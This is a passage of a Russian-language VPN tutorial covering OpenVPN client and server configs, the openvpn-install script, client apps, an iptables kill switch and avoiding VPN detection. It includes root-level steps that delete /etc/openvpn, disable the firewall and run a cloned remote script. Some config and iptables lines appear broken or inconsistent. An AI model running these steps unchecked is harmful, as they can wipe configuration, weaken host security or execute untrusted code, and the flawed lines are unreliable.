У меня вывод такой:

udp      0.0.0.0:16122   0.0.0.0:*     484/openvpn

Все проверили, молодцы. Теперь остановим:

systemctl stop openvpn

или

/etc/init.d/openvpn stop

Делаем клиента, генерируем ключи.

Для начала нам нужно скопировать пример конфиг. файла для клиента. Скопируем его в папочку /etc/openvpn/easy-rsa/keys и переименуем (даем расширение .ovpn):

cp /usr/share/doc/openvpn/examples/sample-config-files/client.conf /etc/openvpn/easy-rsa/keys/client.ovpn

Редактируем файл клиента:

nano /etc/openvpn/easy-rsa/keys/client.ovpn

Листаем файл вниз, натыкаемся на строку

remote my-server-1 1194

где: my-server-1 — IP адрес вашего сервера. Тот, что пришел вам на почту или смотрите по команде ip addr | grep inet и ищите. 1194 — Порт, на котором слушает OpenVPN на вашем сервере, в моем случа это 16122.

Меняйте эту строку, я меняю:

remote 111.222.111.222 16122

Листаем ниже, находим строку:

ns-cert-type server

стираем ее и меняем на:

remote-cert-tls server

Еще чуть ниже строка:

;cipher x

Меняем шифрование на то, которое вы указывали в server.conf. Я указывал AES-256-CBC:

cipher AES-256-CBC

Если вы в server.conf ничего не указывали, то эту строку не трогайте.

Все. Сохраняем и закрываем.

Теперь нужно сгенерировать ключи и серты для клиента.

Перейдем в папку easy-rsa:

cd /etc/openvpn/easy-rsa

Генерим:

./build-key client1

где: client1 — название клиента. Может быть любым. Я сделал client1.

Таким же образом, как и с сервом, везде жмем Enter. И соглашаемся, нажимая y, там где это нужно.

Клиентский конфиг состоит из:

.ovpn файла. В моем случае это client.ovpn.

файла ca.crt — который общий для сервера и все клиентов.

файл ta.key — тоже общий для сервера и клиента. Это для tls-auth, что не обязательно.

файлов client1.crt и client1.key — которые индивидуальные для каждого клиента.

Дело в том, что все эти файлы нужны .ovpn конфигу, без них он не будет работать. Но не будем же мы их везде вместе таскать! Поэтому есть возможность все эти файлы строить в .ovpn конфиг, чтобы был один единый файл и все.

Нужно проделать кое-какие манипуляции, поэтому для удобства создаем папку client1:

mkdir /etc/openvpn/easy-rsa/keys/client1

Нужно скопировать туда конфиг.файл .ovpn и все серты и ключи, по аналогии с сервером, файлы client1.crt и client1.key имеют названия специфические, в зависимости от того, какое вы указывали имя клиента, выполняя команду выше. Я назвал client1 поэтому у меня они называются именно так.

Копируем:

cp /etc/openvpn/easy-rsa/keys/{ca.crt,client1.crt,client1.key} /etc/openvpn/easy-rsa/keys/client1

За одно копируем client.ovpn (называться может как угодно, хоть xuy.ovpn):

cp /etc/openvpn/easy-rsa/keys/client.ovpn /etc/openvpn/easy-rsa/keys/client1

И не забываем про ta.key, которые лежит в папке openvpn:

cp /etc/openvpn/ta.key /etc/openvpn/easy-rsa/keys/client1/

Переходим в папку client1:

cd /etc/openvpn/easy-rsa/keys/client1

На данный момент там находится 5 файлов:

ca.crt client.ovpn (конфиг файл) client1.crt client1.key ta.key

Теперь нужно быть внимательнее! В особенности с именами файлов. Внедряем содержимое нужных файлов в наш конфиг .ovpn.

По очереди, в том порядке, в котором это у меня, выполняем следующие команды.

Для ca.crt:

echo '' &gt;&gt; client.ovpn
cat ca.crt &gt;&gt; client.ovpn
echo '' &gt;&gt; client.ovpn

где client.ovpn название конфиг файла.

Теперь для client1.crt:

echo '' &gt;&gt; client.ovpn
cat client1.crt &gt;&gt; client.ovpn
echo '' &gt;&gt; client.ovpn

где client1.crt — серт. файл, которые генерировали выше.

Теперь для client1.key:

echo '' &gt;&gt; client.ovpn
cat client1.key &gt;&gt; client.ovpn
echo '' &gt;&gt; client.ovpn

Теперь для ta.key, нужно для tls-auth:

echo 'key-direction 1' &gt;&gt; client.ovpn
echo '' &gt;&gt; client.ovpn
cat ta.key &gt;&gt; client.ovpn
echo '' &gt;&gt; client.ovpn

Таким образом, все ключи и сертификаты теперь в одном файле .ovpn, и он может работать сам по себе.

Теперь нужно еще немного отредактировать файл client.ovpn:

nano client.ovpn

Листаем, пока не наткнемся на блок:

ca ca.crt
cert client.crt
key client.key

Нам это не нужно, поэтому закоментируем их:

#ca ca.crt
#cert client.crt
#key client.key

Собственно, конфиг клиента готов. Он будет работать, если вы запустите его на OpenVPN клиенте вашего устройства.

Можем запускать OpenVPN:

systemctl start openvpn

или

/etc/init.d/openvpn start

После любых манупуляций в файле server.conf, для того что бы применились изменения, нужно перезапускать OpenVPN:

systemctl restart openvpn

или

/etc/init.d/openvpn restart

Но я хочу еще проделать какие-то модификации на server.conf и client.ovpn

Для начала я хотел бы привести оба конфига в более читабельный и простой вид, а именно, удалить все комментарии и пустые строки.

Сделать это легко. Но для начала, на всякий случай, сделаем backup:

server.conf

cp /etc/openvpn/server.conf /etc/openvpn/server.conf.bak

и client.ovpn:

cp /etc/openvpn/easy-rsa/keys/client1/client.ovpn /etc/openvpn/easy-rsa/keys/client1/client.ovpn.bak

теперь одной командой удаляем все комментарии (# и ; в начале строки) и пустые строки:

server.conf

sed -i '/^[#;]\|^$/ d' /etc/openvpn/server.conf

client.ovpn

sed -i '/^[#;]\|^$/ d' /etc/openvpn/easy-rsa/keys/client1/client.ovpn

И оба наших конфига примут более читабельный вид.

Открываем server.conf

nano /etc/openvpn/server.conf

И куда-нибудь в середину прихерачим следующее:

sndbuf 
rcvbuf 
topology subnet
auth SHA512

И на клиенте.

nano /etc/openvpn/easy-rsa/keys/client1/client.ovpn

Куда-нибудь в конфиг, до начала сертификатов и ключей:

sndbuf 
rcvbuf 
keepalive 10 120
auth SHA512

Таким образом, мой конфиг server.conf выглядит так:

port 16122
proto udp
dev tun
sndbuf 
rcvbuf 
ca ca.crt
cert server.crt
key server.key  # This file should be kept secret
dh dh2048.pem
tls-auth ta.key 
topology subnet
server 10.8.0.0 255.255.255.0
ifconfig-pool-persist ipp.txt
push "redirect-gateway def1 bypass-dhcp"
push "dhcp-option DNS 8.8.8.8"
push "dhcp-option DNS 8.8.4.4"
keepalive 10 120
cipher AES-256-CBC
auth SHA512
comp-lzo
persist-key
persist-tun
log /dev/null 2&gt;&amp;1
verb

А client.ovpn так (Безключей и сертификатов):

client
dev tun
proto udp
sndbuf 
rcvbuf 
remote 111.222.111.222 14500
resolv-retry infinite
nobind
persist-key
persist-tun
remote-cert-tls server
cipher AES-256-CBC
auth SHA512
keepalive 10 120
comp-lzo
verb 3

Можете использовать эти конфиги.

Разберем немного конфиг.

proto udp

Какой протокол юзать, TCP или UDP?

UDP обычно работает быстрее.

TCP более надежный, стабильный, лучше обходит фаерволл — например можно повестить на порт 443.

UDP, также можно повесить на порт, который обычно не блокируют — 53.

Если вас не блокируют, то лучше я думаю UDP. Сам юзаю UDP. На сервере и клиенте должен быть указан один протокол.

Port 16122

На какой порт повесить? Лучше на нестандартный, как у меня. Или замаскировать под какой-то сервис — 443/ssl для tcp и 53/dns для udp

cipher AES-256-CBC

Какое шифрование использовать?

Используйте AES-256-CBC или AES-128-CBC. Если явно не задать, то по-умолчанию будет исопльзоваться Blowfish (cipher BF-CBC). Этот параметр должен быть и на сервере и на клиенте. Если на сервере есть, на клиенте нет или они отличаются, может не законнектить.

auth SHA512

Если не задавать, будет использоваться auth SHA1. Используйте auth SHA512 или auth SHA256. Этот параметр должен быть и на сервере и на клиенте. Если на сервере есть, на клиенте нет или они отличаются, может не законнектить.

#status /dev/null 2&gt;&amp;1

По умолчанию будет записываться в файл какой-то, какие клиенты сейчас онлайн. Чтобы ничего не писало, нужно закомментировать строку. Я также ЗАЧЕМ то написал /dev/null 2>&1 …

log /dev/null 2&gt;&amp;1

Это то самое логирование OpenVPN которое для безопасности лучше выключить. Дело в том, что выключить его нельзя, а если закоментировать, то логи будут писаться в /var/log/syslogПоэтому я раскоментировал и сказал писать в /dev/null.

push "dhcp-option DNS 8.8.8.8"
push "dhcp-option DNS 8.8.4.4"

Какие DNS юзать?

Юзайте паблик DNS от Google (8.8.8.8 и 8.8.4.4.) или от OpenDNS (208.67.222.222 и 208.67.220.220).

Утечка DNS под Windows и Linux

Если вы будете юзать этот конфиг на Windows, в конфиг добавляем следующую строку:

setenv opt block-outside-dns

Да, вот так просто. Под MacOS с Tunnelblick все норм.

А под Linux есть файл update-resolv-conf, который находится в папке /etc/openvpn на клиентской машине. Файл может иметь название или update-resolv-conf или update-resolv-conf.sh. Поэтому на клиентском Линукс вводим в терминале:

ls /etc/openvpn | grep update

И узнаем название файла.

Далее, в конфиг .ovpn нужно вставить следующие строки:

script-security 2
up /etc/openvpn/update-resolv-conf
down /etc/openvpn/update-resolv-conf

где update-resolv-conf — название файла, которое вы получили выше.

Перекидываем конфиг .ovpn с серва на клиент.

Можете просто открыть клиентский конфиг, скопировать все полностью и вставить у себя на машине, окда.

Если вы создавали пользователя и запрещали ssh коннект от рута, то первым делом нужно поместить .ovpn конфиг в домашнюю папку созданного пользователя. У меня это был pp-ruloh

cp /etc/openvpn/easy-rsa/keys/client1/client.ovpn /home/pp-ruloh

Изменить права у файла:

chown pp-ruloh:pp-ruloh /home/pp-ruloh/client.ovpn

Linux. Будем юзать sftp.

sftp -P 1488 pp-ruloh@ip

где 1488 — порт на котором слушает sshd.

Как законнектились, мы уже будем в домашней папке pp-ruloh. Можем посмотреть файлы — вводим ls.

копируем конфиг:

get client.ovpn ~/

Windows, linux, MacOS: скачиваем программу для работы по FTP — FileZilla и подключаемся к серву по sftp. Нужено будет указать port sftp (у меня 1488), пользователя (pp-ruloh, ибо руту зарпетили). Копируем файл куда хотим и радуемся. Как пользоваться программой разберетесь сами.

Поднимаем OpenVPN скриптом

Поднять OpenVPN вручную вам не под силу? Не отчаивайтесь, у меня для вас хорошие новости!

На Github существует Open Source скрипт, который позволяет быстро и легко поднять OpenVPN сервер на вашем VPS. Скрипт называтся openvpn-install, и вот ссылка на Github. И этого скрипта есть куча форков, которые вы можете изучить.

Посмотреть исходный код можно здесь. Приступим. Работаем под пользователем root или суперпользователем.

Для начала, обновим систему:

apt-get update &amp;&amp; apt-get dist-upgrade -y

Если вы уже пытались поднять OpenVPN вручную, но у вас ничего не получилось, то нужно сначала его полностью снести. Удаляем openvpn:

apt-get remove --purge openvpn

удаляем папку:

rm -rf /etc/openvpn/

выключаем ufw:

ufw disable

и установим нужные пакеты:

apt-get install -y sudo nano curl perl python wget git iptables openvpn openssl ca-certificates

Скачиваем скрипт в домашнюю папку root:

git clone https://github.com/Nyr/openvpn-install.git ~/nyr-openvpn

Переходим туда:

cd ~/nyr-openvpn/

Запускаем скрипт:

bash openvpn-install.sh

И вы попадете в так называемый Инсталятор. Где нужно будет отвечать на вопросы или что-то вписывать. Для перехода на следующий этап установки жмите Enter.

Первый делом, предложит ввести внешний IP адрес, но вероятнее всего скрипт сам его определит:

IP address: 111.222.111.222

Следующий этап, выбрать протокол. Кликаете 1 и выбираете UDP. Далее, выбираете порт. В статье указакана 14000. После этого предложит выбрать DNS сервера. Выбор будет из Google, OpenDNS или текущих, которые на VPS и еще каких-то. Мы выбираем OpenDNS, жмите 3. После этого предложит ввести имя клиента. Мы ввели «pp-ruloh». Далее начнется скачивание-утановка пакетов, генерация ключей, сертификатов и конфигурационных файлов. когда все закончится, он поместит конфиг. в домашнюю папку юзера, от имени которого запсукался скрипт. То есть, сейчас конфиг лежит по адресу:

/root/

Собственно, на этом конфигурация OpenVPN скриптом завершается. Можно уже сейчас взять новый конфиг и использовать. Посмотрим на конфиг pp-ruloh.ovpn:

nano ~/pp-ruloh.ovpn

(без ключей и сертификатов)

client
dev tun
proto udp
sndbuf 
rcvbuf 
remote 111.222.111.222 14000
resolv-retry infinite
nobind
persist-key
persist-tun
remote-cert-tls server
cipher AES-256-CBC
comp-lzo
setenv opt block-outside-dns
key-direction 1
verb 3

Все вроде бы нормально, да лучше auth SHA512 явно указать. Поэтому добавим

auth SHA512

Вот так:

client
dev tun
proto udp
sndbuf 
rcvbuf 
remote 111.222.111.222 14000
resolv-retry infinite
nobind
persist-key
persist-tun
remote-cert-tls server
cipher AES-256-CBC
auth SHA512
comp-lzo
setenv opt block-outside-dns
key-direction 1
verb 3

Обратите внимание, что скрипт уже активен для предотвращения утечки DNS под клиент Windows:

setenv opt block-outside-dns

Если у вас Linux или MacOS — эту строку лучше закомментировать.

Теперь посмотрим на серверный конфиг server.conf:

nano /etc/openvpn/server.conf
port 14000
proto udp
dev tun
sndbuf 
rcvbuf 
ca ca.crt
cert server.crt
key server.key
dh dh.pem
tls-auth ta.key 
topology subnet
server 10.8.0.0 255.255.255.0
ifconfig-pool-persist ipp.txt
push "redirect-gateway def1 bypass-dhcp"
push "dhcp-option DNS 208.67.222.222"
push "dhcp-option DNS 208.67.220.220"
keepalive 10 120
cipher AES-256-CBC
comp-lzo
user nobody
group nogroup
persist-key
persist-tun
status openvpn-status.log
verb 3
crl-verify crl.pem

Здесь также добавляем auth SHA512 (а то работать не будет, если на клиенте указан а на сервере нет), делаем verb 0. Также нужно проделать следующее. Нужно закомментировать строку.

status openvpn-status.log

И добавить log:

log /dev/null 2&gt;&amp;1

Где-то выше писал, зачем он нужен. Получилось так:

port 14000
proto udp
dev tun
sndbuf 
rcvbuf 
ca ca.crt
cert server.crt
key server.key
dh dh.pem
tls-auth ta.key 
topology subnet
server 10.8.0.0 255.255.255.0
ifconfig-pool-persist ipp.txt
push "redirect-gateway def1 bypass-dhcp"
push "dhcp-option DNS 208.67.222.222"
push "dhcp-option DNS 208.67.220.220"
keepalive 10 120
cipher AES-256-CBC
auth SHA512
comp-lzo
user nobody
group nogroup
persist-key
persist-tun
#status openvpn-status.log
log /dev/null 2&gt;&amp;1
verb 
crl-verify crl.pem

Берем клиентский файл-конфиг и помещаем на ваше устройство. Об этом я писал выше.

При повторном запуске скрипта из-под рута:

bash /root/nyr-openvpn/openvpn-install.sh

Скрипт предложит создать нового клиент, удалить существующего (не сможет больше коннектиться) или удалить OpenVPN.

Клиенты OpenVPN под разные ОС

Поскольку OpenVPN не встроен по-умолчанию ни в одну популярную ОС, то требуется установить сторонее ПО — клиент OpenVPN.

Windows

Под Windows есть официальный клиент, называется OpenVPN GUI. Скачать его можно на офф. сайте OpenVPN. Скачиваете, устанавливаете. Появится ярлык на раб. столе, после запуска — иконка в трее.

Далее, помещаете ваш .ovpn файл в папку config, в установленной папке OpenVPN. В общем, если устанавливать OpenVPN GUI по-умолчанию в папку Program Files, то адрес такой:

C:\Program Files\OpenVPN\config

В эту папку кидаем конфиги .ovpn. Потом из трея можно запускать VPN. Все достаточно просто.

Linux

На Линукс в репозиориях вашего дистрибутива пакет скорее всего будет называется «openvpn» (еще может openvpn-client), и ставится следующим образом:

sudo apt-get install openvpn

Если у вас Debian-подобные дистрибутивы (Debian, Ubuntu, Mint). Если у вас дистрибутив другой линейки — сами разберетесь как ставить.

Работает это следующим образом. У вас есть .ovpn файл, далее вы в терминале вводите команду:

sudo openvpn --config &lt;путь до файла .ovpn&gt;

где <путь до файла .ovpn>, собственно, путь до файла .ovpn.

Или можете скормить файл network-manager ‘ у.

MacOS

Под MacOS из клиентов OpenVPN подходит Tunnelblick. Скачать его можно здесь. Устанавливается просто, требует права суперпользователя. По-умолчанию будет отправлять файлы с расширением .ovpn. Будет иконка в трее, там конектимся. Можно настроить, что бы коннектился к OpenVPN сразу при загрузке системы. Когда соеденение обрывается с VPN, интернет пропадает. В этом случае нужно вручную отсоединяться от VPN.

Android

Официальный клиент OpenVPN Connect под Android доступен для скачивания на Google Play

iOS

Для iOS клиент скачиваем из AppStore.

Клиенты, предоставляемые провайдером VPN. Некоторые провайдеры предоставляеют свой собственный OpenVPN клиент под разные ОС и платформы. Использовать их или нет, решать вам. Но это потенциально не очень безопасно.

Список vpn, которые 100% ведут логи можете найти в этой статье.

Запрещаем весь траффик не через OpenVPN на клиенте

Правила iptables. Только для адептов Луникса. Что делать если VPN внезапно отключился? Или вы забыли его включить вообще? Обычно, когда внезапно обнаруживаешь, что траффик идет не через VPN, и при этом ты не используешь Whonix, то через 3 секунды понимаешь, что твои штаны полны говна. Что нужно делать чтобы явно ограничить весь траффик?

А вот и сами правила:

# запрещаем все входящие и исходящие
iptables -P INPUT DROP
iptables -P OUTPUT DROP

# разрешаем уже установленные соединения и локалхост
iptables -A INPUT -i lo -j ACCEPT
iptables -A OUTPUT -o lo -j ACCEPT
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT

# разрешаем соединения до VPN (VPN_IP заменить на ip вашего VPN сервера)
iptables -A OUTPUT -d VPN_IP -j ACCEPT

# разрешаем любые соединения через VPN
iptables -A OUTPUT -o tun+ -j ACCEPT

В конце:

# разрешаем любые соединения через VPN
iptables -A OUTPUT -i tun+ -j ACCEPT

Было изменено на:

# разрешаем любые соединения через VPN
iptables -A OUTPUT -i tun+ -j ACCEPT

Есть у нас правила, что дальше? Теперь открываем терминал в вашем Линуксе

И создаем файл, который назовем vpn.rules:

touch ~/vpn-rules.sh

Поместим туда все правила:

nano ~/vpn-rules.sh

В самом верху файла пишем:

#!/bin/sh

Далее, правила из кода выше. Копируете — вставляете, меняете

# разрешаем соединения до VPN (VPN_IP заменить на ip вашего VPN сервера)
iptables -A OUTPUT -d VPN_IP -j ACCEPT

там где VPN_IP на IP вашего сервера (указан в .ovpn конфиге).

Сохраняете — закрываете.

Запсукае скрипт из под рута или sudo:

sudo sh ~/vpn-rules.sh

Теперь у вас применились правила. Можете проверить — без VPN интернет работать не будет. Этот скрипт можно запускать каждый раз. Так же можно сохранить правила:

sudo iptables-save &gt; /etc/iptables/iptables.rules

И сделать сервис iptables автозапускающимся при загрузки системы:

systemctl enable iptables

На этом все.

Боремся с детектом OpenVPN

VPN может детектироваться конечным ресурсом (например сайт) какими-то хитро-выебанными способами. Для начала можете читануть статью на хабре

Заходим на browserleaks.com

И смотрим строку «TCP/IP OS Fingerprinting»

Что делать?

Если у вас, конфиг UDP, то можно проделать следующее. нужно прописать

mssfix

На клиенте .ovpn и сервере server.conf